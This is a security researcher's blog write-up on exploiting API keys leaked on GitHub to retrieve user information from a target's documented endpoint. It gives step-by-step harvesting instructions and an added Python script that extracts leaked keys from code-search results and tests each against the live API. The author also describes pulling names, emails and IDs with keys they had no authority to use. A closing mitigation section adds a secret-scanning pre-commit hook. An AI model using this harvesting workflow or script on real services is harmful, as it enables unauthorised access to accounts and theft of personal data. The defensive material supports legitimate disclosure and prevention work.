
Disclosed API key to list user information and complete exploitation!!

Hi all, this is Kullai (Security Researcher). Today I am going to share one of my interesting findings, where leaked API keys disclose user information.

3 min read · Nov 26, 2022


Description and what this vulnerability is all about:

Developers increasingly rely on cloud-based tools to automate building code and deploying services, which leads to far more instances of accidental public exposure of sensitive data.
There is a lot an attacker can do with a developer's cloud credentials: spin up hundreds of servers, take down servers, "redistribute" DNS and load balancers, and much more.
Accidental public exposure of credentials such as API keys, OAuth tokens and app secrets is a mistake made by both inexperienced and seasoned developers, particularly when it comes to source control.
Right now there are thousands of exposed API keys on GitHub that can be found in minutes with GitHub code search; bots find them in seconds.

Methodology:

  1. GitHub recon.
  2. The target should have public API documentation that includes curl commands.

Steps to exploit:

  1. In the methodology section I mentioned the API curl command. If the target publishes one, you have a good chance of finding this vulnerability.
  2. Now we get started.
  3. Suppose you have a target that has API documentation.
  4. Go to a search engine and type "target.com api documentation curl".
  5. You will find commands of this type:

curl -H "content-type: application/json" -H "X-Api-Key: yourAPIkey" -X GET https://api.target.com/api/v1/user

  6. The command above returns user information to anyone who knows a valid API key; no other authentication is involved.
  7. Now go to GitHub and perform recon there.
  8. Search for "target.com" api key
  9. Don't hurry: you may find a lot of keys, and some will still be valid while others have already been revoked.
  10. Replace yourAPIkey with a key you found on GitHub.
  11. Copy the whole command and run it from a Linux terminal.

Example output (screenshot in the original post): the response discloses user information.
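To make steps 8 to 11 repeatable across the many keys that turn up, here is an added Python example (not code from the original post) that pulls candidate keys out of code-search hits, drops documentation placeholders, and replays the documented request exactly once per unique key, classifying each as valid, revoked or rate-limited. The URL and header name are taken from the article's curl command and stand in for whatever the target documents; the search hits and keys below are constructed sample data, and `fake_check` replaces the network call so the script runs offline.

```python
"""Triage API keys harvested from public code search.

Added example, not code from the original post. The URL and header come
from the article's curl command and are placeholders for the target's own
documented request; SAMPLE_HITS and the keys in it are constructed data.
"""
import json
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional

# Key material as it usually appears in committed code or docs:
#   X-Api-Key: <key>     api_key = "<key>"     API-KEY='<key>'
KEY_PATTERN = re.compile(
    r"(?i)(?:x-api-key|api[_-]?key)\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{20,})"
)
# Documentation placeholders that are not real keys.
PLACEHOLDER = re.compile(r"(?i)^(your|example|xxx|changeme)")

# Constructed search hits (path -> file content), not real repositories.
SAMPLE_HITS: Dict[str, str] = {
    "org/app/config/settings.py":
        'API_KEY = "sk_live_constructed_key_AAAAAAAA1111"\n',
    "org/app/README.md":
        "curl -H 'X-Api-Key: yourAPIkey' https://api.target.com/api/v1/user\n",
    "other/deploy.sh":
        'export API_KEY="sk_live_constructed_key_AAAAAAAA1111"\n'
        'curl -H "X-Api-Key: revoked_constructed_key_BBBBBBBB2222" ...\n',
}

def extract_keys(hits: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each unique candidate key to the files it was seen in."""
    found: Dict[str, List[str]] = {}
    for path, content in hits.items():
        for match in KEY_PATTERN.finditer(content):
            key = match.group(1)
            if PLACEHOLDER.match(key):
                continue
            found.setdefault(key, []).append(path)
    return found

def http_check(key: str,
               url: str = "https://api.target.com/api/v1/user",
               timeout: float = 10.0) -> Optional[int]:
    """Replay the documented request with one key; return the HTTP status.

    Returns None if the host cannot be reached. Only run this against
    systems you are authorised to test.
    """
    req = urllib.request.Request(
        url, headers={"X-Api-Key": key, "Content-Type": "application/json"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code
    except urllib.error.URLError:
        return None

def classify(status: Optional[int]) -> str:
    """Turn a status code into a triage verdict."""
    if status is None:
        return "unreachable"
    if status == 200:
        return "valid"
    if status in (401, 403):
        return "revoked_or_invalid"
    if status == 429:
        return "rate_limited"  # back off instead of spraying the remaining keys
    return f"http_{status}"

def triage(hits: Dict[str, str],
           check: Callable[[str], Optional[int]] = http_check) -> Dict[str, dict]:
    """Test every unique candidate exactly once and report the verdicts.

    `check` is injectable so the logic can run without network access.
    """
    report: Dict[str, dict] = {}
    for key, paths in extract_keys(hits).items():
        status = check(key)
        report[key] = {
            "status": status,
            "verdict": classify(status),
            "seen_in": sorted(set(paths)),
        }
    return report

def fake_check(key: str) -> Optional[int]:
    """Offline stand-in for http_check, scripted against SAMPLE_HITS."""
    return {
        "sk_live_constructed_key_AAAAAAAA1111": 200,
        "revoked_constructed_key_BBBBBBBB2222": 401,
    }.get(key, 404)

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_HITS, check=fake_check), indent=2))
```

Deduplicating before testing matters for two reasons: the same key is usually committed in several files, and each probe against the target is a logged authentication attempt, so one request per key is both politer and less likely to trip rate limiting. Swap `fake_check` for the default `http_check` only once you have permission to test the target.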

In my case it leaked user information such as the user's name, ID, email address, profile picture and some other important data about that person. On other websites it may include further PII as well.

I found nearly 10 to 12 API keys, extracted the user information and reported it, but unfortunately their bug bounty program is currently inactive :(

Some of my friends found the same issue in other companies and were rewarded with good bounties.


Mitigation:

When it comes to accidental exposure of API keys and other sensitive data on GitHub, GitHub states very clearly in its Git help pages that "once you have pushed a commit to GitHub, you should consider any data it contains to be compromised. If you committed a password, change it! If you committed a key, generate a new one." GitHub provides detailed instructions on how to purge a file from a repository's history. Purging only removes the file from that repository, not from forks, clones or caches that already picked it up, so revoking and regenerating the key comes first. On the API side, treat the key like a password: the endpoint above hands out account details to anyone holding it, with no second factor, so keys should be revocable and short-lived and the endpoint rate-limited, which caps what a single leaked key can expose.
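Rotation after the fact is the recovery; stopping the key from reaching GitHub in the first place is cheaper. Here is an added Python example (not from the original post or from GitHub's guidance) of a pre-commit hook that scans the staged version of each changed file for key-like assignments and for high-entropy string literals, and refuses the commit when it finds one. The header and variable names it matches, the 3.5 bits-per-character entropy threshold and the `# allow-secret` opt-out marker are this example's own choices; install it by copying the file to `.git/hooks/pre-commit` and making it executable.

```python
#!/usr/bin/env python3
"""Pre-commit guard against committing API keys.

Added example, not from the original post. Scans staged files for
key-like assignments and high-entropy literals; exits 1 to block the
commit. Patterns, threshold and opt-out marker are this example's choices.
"""
import math
import re
import subprocess
import sys
from collections import Counter
from typing import List, Tuple

# Named secrets: X-Api-Key: ..., api_key = "...", SECRET=..., token: ...
KEY_ASSIGNMENT = re.compile(
    r"(?i)(?:x-api-key|api[_-]?key|secret|token)\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{16,})"
)
# Any quoted literal long enough to be key material, judged by entropy.
QUOTED_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/_\-=]{20,})['\"]")
ENTROPY_THRESHOLD = 3.5   # bits per character; random keys sit well above this
ALLOWLIST_MARKER = "# allow-secret"  # explicit opt-out for test fixtures

Finding = Tuple[str, int, str, str]  # (path, line_no, reason, snippet)

def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character; 0.0 for a repeated character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def scan_text(path: str, text: str) -> List[Finding]:
    """Return one finding per suspicious line in `text`."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if ALLOWLIST_MARKER in line:
            continue
        m = KEY_ASSIGNMENT.search(line)
        if m:
            findings.append((path, line_no, "key-like assignment", m.group(1)))
            continue
        for lit in QUOTED_LITERAL.findall(line):
            if shannon_entropy(lit) >= ENTROPY_THRESHOLD:
                findings.append((path, line_no, "high-entropy literal", lit))
    return findings

def staged_files() -> List[str]:
    """Paths added, copied or modified in the index."""
    out = subprocess.run(
        ["git", "diff", "--cached", "--name-only", "--diff-filter=ACM"],
        capture_output=True, text=True, check=True,
    ).stdout
    return [p for p in out.splitlines() if p]

def staged_content(path: str) -> str:
    """Read the staged (index) version of a file, not the working tree."""
    return subprocess.run(
        ["git", "show", f":{path}"], capture_output=True, text=True, check=True,
    ).stdout

def main() -> int:
    findings: List[Finding] = []
    for path in staged_files():
        try:
            findings.extend(scan_text(path, staged_content(path)))
        except (subprocess.CalledProcessError, UnicodeDecodeError):
            continue  # binary file or transient git error; not our concern here
    for path, line_no, reason, snippet in findings:
        # Print only a prefix so the hook itself does not echo the secret.
        print(f"{path}:{line_no}: {reason}: {snippet[:6]}...", file=sys.stderr)
    if findings:
        print("Refusing commit. If a real key was staged, rotate it now; "
              f"for fixtures, append '{ALLOWLIST_MARKER}' to the line.", file=sys.stderr)
        return 1
    return 0

if __name__ == "__main__":
    sys.exit(main())
```

The entropy check catches keys stored under variable names the regex does not know about, while the allowlist marker keeps deliberately fake fixtures from blocking every commit. Hooks are advisory, since a developer can bypass them with `--no-verify`, so this complements, rather than replaces, server-side secret scanning on the hosting platform.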

And that is all about disclosed API keys listing user information and complete exploitation!! Hope you learned something new :)

Follow me for more content:

LinkedIn | Twitter

Thanks for reading :)
